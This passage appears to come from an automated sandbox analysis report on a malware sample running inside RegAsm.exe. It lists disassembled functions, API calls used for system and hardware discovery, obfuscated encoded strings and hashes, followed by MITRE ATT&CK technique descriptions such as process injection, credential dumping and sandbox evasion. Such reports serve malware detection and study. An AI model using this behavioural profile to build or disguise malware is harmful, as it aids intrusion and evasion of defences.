API ID: __getptd$__amsg_exit__getptd_noexit
String ID: csm
API String ID: 803148776-1018135373
Opcode ID: 86966626eb4e0d809bdbd7093bece3461dc5396f3a0cf366651c66bb381db945
Instruction ID: f1b43a46a5ba6da2c456c1b1d08720c46f079c9245cbb473e17adbb9e77465a1
Opcode Fuzzy Hash: 86966626eb4e0d809bdbd7093bece3461dc5396f3a0cf366651c66bb381db945
Instruction Fuzzy Hash: 93016D34801304CFDF24AF62E450AADB3B9BF2831AF64C92EE05156A50DB30C988CB41

Uniqueness

Uniqueness Score: -1.00%

Function 6C953EA4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 26COMMONLIBRARYCODE

Download Yara Rule

APIs

DName::DName.LIBCMT ref: 6C953ED9
DName::DName.LIBCMT ref: 6C953EE5

Strings

{flat}, xrefs: 6C953ED4

Memory Dump Source

Source File: 00000000.00000002.1384971621.000000006C8E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C8E0000, based on PE: true

Associated: 00000000.00000002.1384909940.000000006C8E0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385630538.000000006C964000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385787961.000000006C97E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385822311.000000006C980000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385918382.000000006C981000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385966714.000000006C983000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386217873.000000006C98E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c8e0000_TT4ybwWc1T.jbxd

Similarity

API ID: NameName::
String ID: {flat}
API String ID: 1333004437-2606204563
Opcode ID: 56f42394597a17032836697880efaf08897e999b0586685d2560e5126dd7c166
Instruction ID: 654134579739e41282a05f78df86c3b5526ff3d0b7315e50d9178f7caa08836f
Opcode Fuzzy Hash: 56f42394597a17032836697880efaf08897e999b0586685d2560e5126dd7c166
Instruction Fuzzy Hash: 11F0ED71245248AFCB00CF78C050BE83BF4AB8279AF44C082EA4C0FB86C732D856CB54

Uniqueness

Uniqueness Score: -1.00%

Function 6C8F7680 Relevance: 5.1, APIs: 4, Instructions: 71COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?,65628154), ref: 6C8F76AD
LeaveCriticalSection.KERNEL32(?,?,?,65628154), ref: 6C8F76FF
EnterCriticalSection.KERNEL32(65628154,?,?,?,65628154), ref: 6C8F770D
LeaveCriticalSection.KERNEL32(65628154,?,00000000,?,?,?,?,65628154), ref: 6C8F772A

Part of subcall function 6C949BB5: _malloc.LIBCMT ref: 6C949BCF

Part of subcall function 6C8F6D40: _rand.LIBCMT ref: 6C8F6DEA

Memory Dump Source

Source File: 00000000.00000002.1384971621.000000006C8E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C8E0000, based on PE: true

Associated: 00000000.00000002.1384909940.000000006C8E0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385630538.000000006C964000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385787961.000000006C97E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385822311.000000006C980000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385918382.000000006C981000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385966714.000000006C983000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386217873.000000006C98E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c8e0000_TT4ybwWc1T.jbxd

Similarity

API ID: CriticalSection$EnterLeave$_malloc_rand
String ID:
API String ID: 119520971-0
Opcode ID: 45e68bb2110ef8bb9a877ab68f5fc91d1dcdb2d0252bd68ae1963ebc5e4ac01e
Instruction ID: c60b4c4ba33896bd29dd5f745c7a2f384280ae96404b2c2b1fe0775e3ab51f8a
Opcode Fuzzy Hash: 45e68bb2110ef8bb9a877ab68f5fc91d1dcdb2d0252bd68ae1963ebc5e4ac01e
Instruction Fuzzy Hash: EC216571504619EFDB10DF55CD44EEFB7BCFF42254F104A2AE82697A40EB74AA05CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 6C8F9580 Relevance: 5.1, APIs: 4, Instructions: 68COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?,?,?), ref: 6C8F95A9
LeaveCriticalSection.KERNEL32(?,?,?,?), ref: 6C8F95CA
EnterCriticalSection.KERNEL32(00000000,?,?), ref: 6C8F95DA
LeaveCriticalSection.KERNEL32(00000000,?,?,?), ref: 6C8F95FB

Memory Dump Source

Source File: 00000000.00000002.1384971621.000000006C8E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C8E0000, based on PE: true

Associated: 00000000.00000002.1384909940.000000006C8E0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385630538.000000006C964000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385787961.000000006C97E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385822311.000000006C980000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385918382.000000006C981000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385966714.000000006C983000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386217873.000000006C98E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c8e0000_TT4ybwWc1T.jbxd

Similarity

API ID: CriticalSection$EnterLeave
String ID:
API String ID: 3168844106-0
Opcode ID: 8df49605a5ec784f968fec7e04cfc98c37b111babcb9a2c080598042089e9e4e
Instruction ID: f5a3e4f8cab634ba0a3c865359a174d6f420ea515ca883648db0604f55dcf5cb
Opcode Fuzzy Hash: 8df49605a5ec784f968fec7e04cfc98c37b111babcb9a2c080598042089e9e4e
Instruction Fuzzy Hash: A8117F32A05118EFCB10CFD9EA80DEEF7B8FF55614B10459AE525D7A10D730EA56CB90

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: RegAsm.exePID: 7208, Parent PID: 5496COMMON

Executed Functions

Function 0040E8E7 Relevance: 58.1, APIs: 17, Strings: 15, Instructions: 2062stringCOMMON

Download Yara Rule

APIs

lstrcatW.KERNEL32(?,?), ref: 0040EE87
lstrcatW.KERNEL32(?,00000000), ref: 0040EE8F
lstrcmpW.KERNEL32(00000000,?), ref: 0040EEE7
lstrlenW.KERNEL32(?), ref: 0040EF8A

Strings

<u, xrefs: 0041008E
X#, xrefs: 00410261
<u, xrefs: 0040F1AF
S(OZ, xrefs: 0040FF42
}G`-, xrefs: 0040EB14
byn, xrefs: 0040EBEC
Z4v|, xrefs: 0040EF25
0l, xrefs: 0040E956
2, xrefs: 0040FB63
ZwC;, xrefs: 0040EE51
S(OZ, xrefs: 0040ED8E
byn, xrefs: 0040F4C9
X#, xrefs: 0040F14E
byn, xrefs: 004102D1
}G`-, xrefs: 00410721

Memory Dump Source

Source File: 00000002.00000002.1773865046.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Similarity

API ID: lstrcat$lstrcmplstrlen
String ID: 0l$2$S(OZ$S(OZ$X#$X#$Z4v|$ZwC;$}G`-$}G`-$ <u$ <u$byn$byn$byn
API String ID: 3310220928-349824884
Opcode ID: 81d659fedafe7e4068787f1cb0b9450bc41ae2bbc44a50e801888f4642d47be6
Instruction ID: b2cf3fcb263bfc10212b3bdf46eed76259520ab1a335cf9dedb715f1476b67da
Opcode Fuzzy Hash: 81d659fedafe7e4068787f1cb0b9450bc41ae2bbc44a50e801888f4642d47be6
Instruction Fuzzy Hash: 9CF21671E002098BDF249F98C9826BE76B1FB54304F24493BE115FB3D1D7B899919B8B

Uniqueness

Uniqueness Score: -1.00%

Function 00405930 Relevance: 41.8, APIs: 10, Strings: 13, Instructions: 1503stringCOMMON

Download Yara Rule

APIs

lstrcatW.KERNEL32(?,?), ref: 004059A5
_strlen.LIBCMT ref: 00405CCB
lstrcatW.KERNEL32(?,?), ref: 0040610B
lstrcatW.KERNEL32(?,?), ref: 00406414
lstrcatW.KERNEL32(?,?), ref: 0040660D
lstrcatW.KERNEL32(?,?), ref: 00406615
lstrcatW.KERNEL32(?,755AF1F0), ref: 00406A71
lstrcatW.KERNEL32(?,?), ref: 00406AA3
lstrcatW.KERNEL32(?,?), ref: 0040710C

Strings

;3c#, xrefs: 00405EA8
y">`, xrefs: 004062D5
;3c#, xrefs: 00405FB8
y">`, xrefs: 00406450
,#$;, xrefs: 00405A73
l2M, xrefs: 00405D07
Xs7, xrefs: 00406B9B
bU5, xrefs: 0040594C
Xs7, xrefs: 00405BF9
+#$;, xrefs: 00405956
bU5, xrefs: 004065EA
WZ{, xrefs: 00405F56
;3c#, xrefs: 00406F45

Memory Dump Source

Source File: 00000002.00000002.1773865046.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Similarity

API ID: lstrcat$_strlen
String ID: WZ{$+#$;$,#$;$;3c#$;3c#$;3c#$Xs7$Xs7$bU5$bU5$l2M$y">`$y">`
API String ID: 3041409237-2901603288
Opcode ID: 4f44222276b0a875bb200a7294695befecd9e80080722821c6f5a73bed70db09
Instruction ID: 2973972a25f3557211e38bec383da6ba6977e084c5aac7865988fd4f11c040db
Opcode Fuzzy Hash: 4f44222276b0a875bb200a7294695befecd9e80080722821c6f5a73bed70db09
Instruction Fuzzy Hash: 40D282B0D0160A8FDF248F98C895ABEBAB1EB14314F24457BE506FA3D1D7788D518F4A

Uniqueness

Uniqueness Score: -1.00%

Function 00422859 Relevance: 32.3, APIs: 1, Strings: 17, Instructions: 762COMMON

Download Yara Rule

APIs

ExitProcess.KERNEL32 ref: 004235AA

Strings

-B, xrefs: 0042299D
gXRnL3bjnDxHuAVnhaF9wVskIxZnjeRvV5JoUsd+y77xGAJBEZH5W2necAk=, xrefs: 0042332C
.B, xrefs: 0042346A
gXRnL3bjnDxHuAVnhaF9wVskIxZnjeRvV5JoUsd+y77pGxBDFYLuT2necAk=, xrefs: 0042307C
.B, xrefs: 00423421
gXRnL3bjnDxHuAVnhaF9wVskIxZnjeRvV5JoUsd+y777FQpKBYHwXSTTKwHwzw==, xrefs: 00422B81
gXRnL3bjnDxHuAVnhaF9wVskIxZnjeRvV5JoUsd+y77sGxJcE4z1WTOWYxLr, xrefs: 00423103
gXRnL3bjnDxHuAVnhaF9wVskIxZnjeRvV5JoUsd+y77iGwpfE5HvTzCWYxLr, xrefs: 00423250
JVIB, xrefs: 00422DBB
gXRnL3bjnDxHuAVnhaF9wVskIxZnjeRvV5JoUsd+y77jGBJKBoL+UCiWYxLr, xrefs: 00422B2C
gXRnL3bjnDxHuAVnhaF9wVskIxZnjeRvV5JoUsd+y77lAQ9AEozrUmnecAk=, xrefs: 00422E1F
S]<?, xrefs: 004229B3
.B, xrefs: 00422E61
gXRnL3bjnDxHuAVnhaF9wVskIxZnjeRvV5JoUsd+y77qGxBKBJD1RiKWYxLr, xrefs: 004233B4
.B, xrefs: 00422DB0
gXRnL3bjnDxHuAVnhaF9wVskIxZnjeRvV5JoUsd+y773GwtAHY3pT2nIcg==, xrefs: 00422860
.B, xrefs: 00422B49

Memory Dump Source

Source File: 00000002.00000002.1773865046.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Similarity

API ID: ExitProcess
String ID: -B$.B$.B$.B$.B$.B$JVIB$S]<?$gXRnL3bjnDxHuAVnhaF9wVskIxZnjeRvV5JoUsd+y773GwtAHY3pT2nIcg==$gXRnL3bjnDxHuAVnhaF9wVskIxZnjeRvV5JoUsd+y777FQpKBYHwXSTTKwHwzw==$gXRnL3bjnDxHuAVnhaF9wVskIxZnjeRvV5JoUsd+y77iGwpfE5HvTzCWYxLr$gXRnL3bjnDxHuAVnhaF9wVskIxZnjeRvV5JoUsd+y77jGBJKBoL+UCiWYxLr$gXRnL3bjnDxHuAVnhaF9wVskIxZnjeRvV5JoUsd+y77lAQ9AEozrUmnecAk=$gXRnL3bjnDxHuAVnhaF9wVskIxZnjeRvV5JoUsd+y77pGxBDFYLuT2necAk=$gXRnL3bjnDxHuAVnhaF9wVskIxZnjeRvV5JoUsd+y77qGxBKBJD1RiKWYxLr$gXRnL3bjnDxHuAVnhaF9wVskIxZnjeRvV5JoUsd+y77sGxJcE4z1WTOWYxLr$gXRnL3bjnDxHuAVnhaF9wVskIxZnjeRvV5JoUsd+y77xGAJBEZH5W2necAk=
API String ID: 621844428-3111850634
Opcode ID: 1ecf36b4165f9558a0a838dd51f8a9757f0c83a3d42d223099373ca702418efc
Instruction ID: 804140451d45fb4e371f2fdfb4f601274d66fbf63ec87c42839df83b22745841
Opcode Fuzzy Hash: 1ecf36b4165f9558a0a838dd51f8a9757f0c83a3d42d223099373ca702418efc
Instruction Fuzzy Hash: A3424CB0B04351BBDB189E14E99113EB6E0EB50345FD4492FF94ADA3A0D67CCE819B4B

Uniqueness

Uniqueness Score: -1.00%

Function 00427848 Relevance: 16.8, APIs: 2, Strings: 7, Instructions: 1063COMMON

Download Yara Rule

APIs

GetAdaptersInfo.IPHLPAPI(00000000,?), ref: 00427FE2

Strings

8s, xrefs: 0042881D
8s, xrefs: 00427991
8s, xrefs: 004283ED
K{, xrefs: 0042808C
K{, xrefs: 004284E2
8s, xrefs: 00427DF5
J{, xrefs: 00427BFB

Memory Dump Source

Source File: 00000002.00000002.1773865046.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Similarity

API ID: AdaptersInfo
String ID: 8s$8s$8s$8s$J{$K{$K{
API String ID: 3177971545-4208712605
Opcode ID: 3a9d35f272ab4a3ff2c45144d0a631519347da352cb4d98b082731634e5755b5
Instruction ID: 6bb2c298ef40652d4f7bf94a4271195d6d49045035b262bef953a6a97184c375
Opcode Fuzzy Hash: 3a9d35f272ab4a3ff2c45144d0a631519347da352cb4d98b082731634e5755b5
Instruction Fuzzy Hash: C192F670F0512A8BCF249B98E9955BEB6B0AB04340FA5051FE515FB350DB388E41CB9F

Uniqueness

Uniqueness Score: -1.00%

Function 0042998E Relevance: 11.0, APIs: 1, Strings: 5, Instructions: 515
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentHwProfileW.ADVAPI32(?), ref: 0042A1D8

Strings

Lz5 , xrefs: 00429E25
Lz5 , xrefs: 00429C4F
M{5/, xrefs: 00429B3B
gFD0, xrefs: 00429F50
gFD0, xrefs: 00429B46

Memory Dump Source

Source File: 00000002.00000002.1773865046.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Similarity

API ID: CurrentProfile
String ID: Lz5 $Lz5 $M{5/$gFD0$gFD0
API String ID: 2104809126-2435402711
Opcode ID: 8746366ef97a6e9a2f24d04f986a55037c14e28ae7301218baf627cffc57db88
Instruction ID: 2afaacf8f1e2507d5e698c598cc30bf8f01d59bd2b9cc0cb8393ed3328f4d61d
Opcode Fuzzy Hash: 8746366ef97a6e9a2f24d04f986a55037c14e28ae7301218baf627cffc57db88
Instruction Fuzzy Hash: 2612C7B0F002298BDF248F94E8926BEB775EB54314FA4041FE501EA391D77E8D918B4B

Uniqueness

Uniqueness Score: -1.00%

Function 00464894 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 116
timeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0045E594: RtlFreeHeap.NTDLL(00000000,00000000,?,00462255,?,00000000,?,?,00462171,?,00000007,?,?,00462889,?,?), ref: 0045E5AA
Part of subcall function 0045E594: GetLastError.KERNEL32(?,?,00462255,?,00000000,?,?,00462171,?,00000007,?,?,00462889,?,?), ref: 0045E5B5

GetTimeZoneInformation.KERNELBASE(00000000,00000000,00000000,00464D28,?,00000000), ref: 00464906

Strings

W. Europe Standard Time, xrefs: 0046499F
W. Europe Summer Time, xrefs: 004649B3

Memory Dump Source

Source File: 00000002.00000002.1773865046.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Similarity

API ID: ErrorFreeHeapInformationLastTimeZone
String ID: W. Europe Standard Time$W. Europe Summer Time
API String ID: 3335090040-690618308
Opcode ID: a01220f591974c1665ba6122c76446a90b57223d3d430541fd5dc05e670f6b84
Instruction ID: 1fd3fc507ee096ff7b2c68cb38be7d69035845722bcc5defc5b3ef4500fd66a4
Opcode Fuzzy Hash: a01220f591974c1665ba6122c76446a90b57223d3d430541fd5dc05e670f6b84
Instruction Fuzzy Hash: 0B31A2B1900115EACF14AFB6DC4264F7BA8EF85314B11807BF418E7261FB389E448B9A

Uniqueness

Uniqueness Score: -1.00%

Function 004590A1 Relevance: 9.3, APIs: 6, Instructions: 279
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__allrem.LIBCMT ref: 00459234
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00459250
__allrem.LIBCMT ref: 00459267
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00459285
__allrem.LIBCMT ref: 0045929C
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004592BA

Memory Dump Source

Source File: 00000002.00000002.1773865046.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Similarity

API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
String ID:
API String ID: 1992179935-0
Opcode ID: faa6f23ef8369dead50d50129117254ed8f297ca25dcc414a84b199fec4e2219
Instruction ID: bbc74b213edc52fb5d38a711f7fc6e04c403bfeb8e2adab31ad18beb79640a34
Opcode Fuzzy Hash: faa6f23ef8369dead50d50129117254ed8f297ca25dcc414a84b199fec4e2219
Instruction Fuzzy Hash: DD810871600B06EBEB24AE6ACC42B5B73E9AF44725F14452FF811D63C2EB78DD088759

Uniqueness

Uniqueness Score: -1.00%

Function 00464852 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 140
timeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTimeZoneInformation.KERNELBASE(00000000,00000000,00000000,00464D28,?,00000000), ref: 00464906

Part of subcall function 00463ED3: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,00468186,?,00000000,-00000008), ref: 00463F7F

Strings

W. Europe Standard Time, xrefs: 0046499F
W. Europe Summer Time, xrefs: 004649B3

Memory Dump Source

Source File: 00000002.00000002.1773865046.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Similarity

API ID: ByteCharInformationMultiTimeWideZone
String ID: W. Europe Standard Time$W. Europe Summer Time
API String ID: 1123094072-690618308
Opcode ID: d5d0ea3317fd03d5ec64432b9a9d01bbea3d6a9819759831272244476fc3f484
Instruction ID: ffaf6cb2e01a3576f697733ad98ca778e8872b84f72517a8a59d87434b26db0e
Opcode Fuzzy Hash: d5d0ea3317fd03d5ec64432b9a9d01bbea3d6a9819759831272244476fc3f484
Instruction Fuzzy Hash: C841E3B1900115ABDF106FB6DC02A5F7F68EF84314F10416BF918E72A1F7399E548B9A

Uniqueness

Uniqueness Score: -1.00%

Function 0046792C Relevance: 1.5, APIs: 1, Instructions: 44memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 0045EEDF: RtlAllocateHeap.NTDLL(00000000,?), ref: 0045EF11

RtlReAllocateHeap.NTDLL(00000000,?,00426BC5,?,?,?,00426BC5,?,?,?,?,?,00000000,00000000,004269E6,00000000), ref: 00467989

Memory Dump Source

Source File: 00000002.00000002.1773865046.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 5ce38fed3b49aef0ffbb1deb43e4e769209b8400f7c7094110c50b9b610a722d
Instruction ID: ab8131b88a85a6da784fae748f93d22c32416dd0eb71babe8c01ccc97e758a83
Opcode Fuzzy Hash: 5ce38fed3b49aef0ffbb1deb43e4e769209b8400f7c7094110c50b9b610a722d
Instruction Fuzzy Hash: 5DF0287120821566FB212A275C01B6B2B989F8277EF10012BFC14A6291FE2CCC08816F

Uniqueness

Uniqueness Score: -1.00%

Function 0046000D Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000008,?,?,?,0045D6DA,00000001,00000364,?,00000006,000000FF,?,?,00458207,0045EF22), ref: 0046004E

Memory Dump Source

Source File: 00000002.00000002.1773865046.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: af81b02f95dfe7e517ea3b3fa9113c3dcb34a77e0b063231373ba29f2d5bfc0d
Instruction ID: 20bd30f99dd671e79c5c91f70947e330d8309c452a7a1ab13867c96641b12975
Opcode Fuzzy Hash: af81b02f95dfe7e517ea3b3fa9113c3dcb34a77e0b063231373ba29f2d5bfc0d
Instruction Fuzzy Hash: 7AF0E931600224AADB325A23AD05B5B3748EF42761B24412BFC08E7282EE7CDC0086FF

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by hijacking the library manifest used to load DLLs. Adversaries may take advantage of vague references in the library manifest of a program by replacing a legitimate library with a malicious one, causing the operating system to load their malicious library when it is called for by the victim program.
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	Loaded DLLs, Process monitoring, Process use of network
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	API monitoring, PowerShell logs, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
